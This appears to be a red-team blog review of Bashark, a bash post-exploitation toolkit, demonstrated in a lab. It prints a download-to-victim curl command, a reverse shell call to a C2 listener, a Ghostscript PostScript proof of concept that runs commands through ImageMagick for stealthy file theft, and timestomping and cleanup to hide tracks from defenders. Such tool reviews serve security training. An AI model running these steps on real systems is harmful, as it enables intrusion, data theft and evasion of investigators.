Toolsmith Snapshot: Bashark Linux Post-Exploitation Toolkit

Bashark is a convenient bash script, easy to use after you’ve gained access to a Linux target with either user or root permissions. Created by TheSecondSun (Wintermute) and available in his GitHub repository, the feature list follows:

• Single Bash script
• Lightweight and fast
• Multi-platform: Unix, OSX, Solaris, etc.
• No external dependencies
• Immune to heuristic and behavioral analysis
• Built-in aliases of often used shell commands
• Extends system shell with post-exploitation oriented functionalities
• Stealthy, with custom cleanup routine activated on exit
• Easily extensible (add new commands by creating Bash functions)
• Full tab completion

On your victim system, from a prompt, you can get Bashark to get started.

curl https://raw.githubusercontent.com/TheSecondSun/Bashark/master/bashark.sh > bashark.sh

Running Bashark is as easy as sourcing the  bashark.sh  script from the terminal:

$ source bashark.sh

Then, type help to see Bashark’s menu. The results can be seen in Figure 1.

Figure 1:Bashark menu

I’ll walk you through some post-exploitation scenarios with Bashark. We’ll assume that we have acquired user-level permissions on our victim system initially. It’s always good to assess your operating environment as you begin. You will need to determine if you're running on bare metal or a virtual machine with isvm.

bashark_1.0$ isvm
[*] Host is running on a Virtual Machine

We can determine further host information with i.

Figure 2: Target information

Clearly, we don’t have root access, so what steps might we take to elevate privilege? First, I’m always a fan of establishing reverse shell access. Bashark enables this easily with revshell. I ran the following:

revshell 192.168.248.31 31337

And, then, I connected to my Ncat listener on my lab C2 box as seen in Figure 3:

Figure 3: Reverse shell established

You could search for sensitive files that may include credentials or mission-critical data with the likes of fnd (recursive search for strings) and/orfndre for some rudimentary regular expressions. My experiments with the findre function failed no matter how precise the test data. However, there are plenty of other enumeration options as well, including getconf  (to enumerate config files), getperm (files and folders with special perms, see  getperm –help ), fileinfo  (to inspect a file), and usrs (this shows all users on the host). Your best option might be to explore what apps are installed with getapp and determine if there are there vulnerable apps present.

Figure 4: getapp results

As an example, you likely took recent note of the Ghostscript issues (re)discovered by Google’s Tavis Ormandy. Versions up to and including 9.22 are vulnerable, a quick gs -von my victim showed 9.22 present.
Tavis’s write-up on these bugs includes some minimalist PoCs with some interesting ideas for banditry. As a redteamer, I like the applicability of stealing arbitrary files from web servers that use ImageMagick by encoding file contents into image output. If your victim target is a web server this makes for interesting exfil opportunities when placing your output image files in the world-readable /images directory of the httpd hierarchy. This is a bit more stealthy than straight up pilfering via your earlier established reverse shell or the like. Want to dump out results from the lshw command (displays information on the hardware configuration of the system)? Try the following, which on most Ubuntu systems should allow you to convert script content saved as JPEG to a to an image that displays the resulting content. On an Ubuntu system, you can try Tavis’s POC. Save the following script as a JPEG. Example:  lshw.jpeg:

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%lshw) currentdevice putdeviceprops

Then, run the following.

convert lshw.jpeg lshw.gif

If all goes well, your script should be processed by Ghostscript and present results contained in the convert output. Now that you’ve implemented your evil plan, you may want to clean up your tracks before you pop smoke and vacate the premises. And, what about that lshw.jpeg and lshw.gif  you created? All good red teamers use timestomp to confound their blue team friends in their effort to log2timeline their adversarial amigos. Consider how easy Bashark makes it in Figure 5.

Figure 5: timestomp in action

The cleanup routine also is enabled by default, thus when you quit, it should do as promised and clean up behind you. As an example, if you created files or directories while operating in Bashark context with t (create a file) or mkd (create a directory), the quit routine will obey the cleanup directive upon execution, as seen in Figure 6.

Figure 6: I better clean up before I go

The only bug here is that the Bashark-sourced shell doesn’t actually quit, so through down an exit to bail out entirely. To that end, Bashark is a bit buggy, but hey, it’s the first rev of a nice effort, so help TheSecondSun out and submit bugs (I dropped one in the queue), or fork the code and tune it. There are endless options to add as Bashark functions consider spinning a fork and expanding on the theme as well. Hope you have fun with this one, it’s definitely a great starting point for *nix post-exploitation fun. Enjoy!

Cheers until next time!